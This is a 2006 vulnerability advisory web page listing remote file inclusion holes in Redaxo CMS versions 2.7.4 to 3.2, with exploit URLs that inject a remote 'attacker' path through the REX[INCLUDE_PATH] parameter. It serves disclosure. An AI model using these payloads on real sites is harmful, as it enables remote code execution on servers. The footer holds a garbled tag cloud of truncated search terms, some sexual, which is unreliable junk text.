about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Redaxo CMS <= 3.2 (INCLUDE_PATH) Remote File Include Vulnerabilities




2006-06-02 Redaxo CMS <= 3.2 (INCLUDE_PATH) Remote File Include Vulnerabilities 
Rated as : High Risk

Script: Redaxo CMS
Vendor: http://www.redaxo.de
Discovered: beford <xbefordx gmail com>

Redaxo 3.2 - 3.1 - 3.0

./redaxo/include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PATH]=attacker

Redaxo 3.0

./redaxo3_0_demos_patched/redaxo/include/addons/image_resize/pages/index.inc.php?subpage=relations&REX[INCLUDE_PATH]=attacker
./redaxo3_0_demos_patched/redaxo/include/addons/simple_user/pages/index.inc.php?REX[INCLUDE_PATH]=attacker
./redaxo3_0_demos_patched/redaxo/include/addons/stats/pages/index.inc.php?REX[INCLUDE_PATH]=attacker

Redaxo 2.7.4

./redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=attacker
./redaxo/include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=attacker

securitydot.net - 2006-06-02

Advertising

Copyright 2007, SecurityDot
Mon, 09 Nov 2009 14:28:01 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
proc SERVER U F Crack Data Tamil sexy www.worlds buschido www.516025 Gay boy WALID basictoons news for c vs-asp ProFTPD 1. BAVANASEX. realitykin Www.sexeph porno movi all cartoo shakira blackzilla nikki benz CMS is Fre www20.com snow WWW.SEX.CM www.2m tv. Tamil actr sex10 bollybood. www.93tv.c php nuke jana news for c arab sex v www.eyeke. FIn R...ices.c WWW.bokeb wap. sexay news for c Sex wman phpbb 2.0. News Searc shoppi mambo Remo lo783l www..xnx.c Indianbabe BIND 4 BLU SQL in Inv